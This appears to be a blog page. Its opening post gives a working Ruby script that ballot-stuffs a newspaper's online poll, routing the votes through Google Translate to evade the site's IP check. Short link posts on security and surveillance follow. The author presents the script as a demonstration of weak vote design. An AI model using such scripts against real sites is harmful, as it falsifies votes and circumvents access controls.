For Educational Purpose


Not that I care about lame online contests but I thought it would be fun to probe the actual expertise of the self-proclaimed web specialists running the damn thing.

It took approximately 10 minutes to write a bot that votes for the only blog who deserves it. This script issues a valid vote encoded into an URL and hides behind the Google Translate cluster to pass through the IP address check. Now that's a 2.0ish mash-up, isn't it? ;)


#!/usr/bin/env ruby

require 'net/http'
require 'uri'
require 'cgi'

def who_gives_a_shit?
  (1 + rand(5)).to_s
end

params = {
  'votepushed' => 'votepushed',
  'survey' => '496',
  'answer1' => '2',
  'answer2' => who_gives_a_shit?,
  'answer3' => who_gives_a_shit?,
  'answer4' => who_gives_a_shit?,
  'answer5' => who_gives_a_shit?,
}

query_string = params.collect { |k, v| 
  "#{k}=#{CGI.escape(v)}"
}.join('&')

survey_url = 'http://www.lesoir.be'
survey_url += '/special/persoweb2006/results.shtml?' 
survey_url += query_string

proxy_url_path = '/translate?langpair=en|en&u='

proxied_vote_url_path = proxy_url_path + CGI.escape(survey_url)

Net::HTTP.get_print 'www.google.com', proxied_vote_url_path

I'm not affiliated with Mehmet or any other contestant whatsoever. I won't even run this script to fake the vote, I don't care. I just did this because:

  1. It's fun and easy
  2. It demonstrates what an online vote is worth when it's not so well implemented
  3. I'm a bad boy :)

I think I do really love doing useless things.

Pentagon sold biowarfare-capable equipment over Internet


So you are thinking about building a secret lab to develop the next generation of deadly biological warfare but you lack the appropriate gear? Don't worry, the Pentagon has what you need, at a very special discount price!

Private RSS Feeds


Steven Garrity has some interesting thoughts about private RSS feeds.

Iraq foe print, voice, eye info indexed


Iraq is Big Brother's new playground and testbed : U.S. interrogators in Iraq are building a digital catalog of prisoners of war and loyalists of Baath Party, scanning and saving their fingerprints and other body characteristics in databases.

Scapy


Scapy is Python-based shell designed for network packet manipulation and more!

Defending Against an Internet-based Attack on the Physical World


An in-depth analysis of real-life DoS attacks (pdf) like burrying your house under snail-mail spam.

Too Cool For Secure Code


SecurityFocus columnist Jon Lasser : Until Unix and Linux programmers get over their macho love for low-level programming languages, the security holes will continue to flow freely. That's exactly how I felt like when I recently had to code in C after years of comfort and elegance of Python.

US plan to bug Security Council


Now we've got an A class leaked memo here... oh boy, NSA ain't what it used to be... fucking A dudes! :)

Store Sells Anti-Terror Goods


A boutique selling anti-terror gear opens Thursday a few blocks from Ground Zero.

Anti-Leech


Anti-Leech is some sort of lame Anti-Web company. Their so-called security check is a joke!

Pornographer says he hacked al Qaeda


The self-proclaimed creator of the "amateur housewife-next-door genre" says he hacked al Qaeda... because he know[s] the internet!

Older posts: 1 2 3 4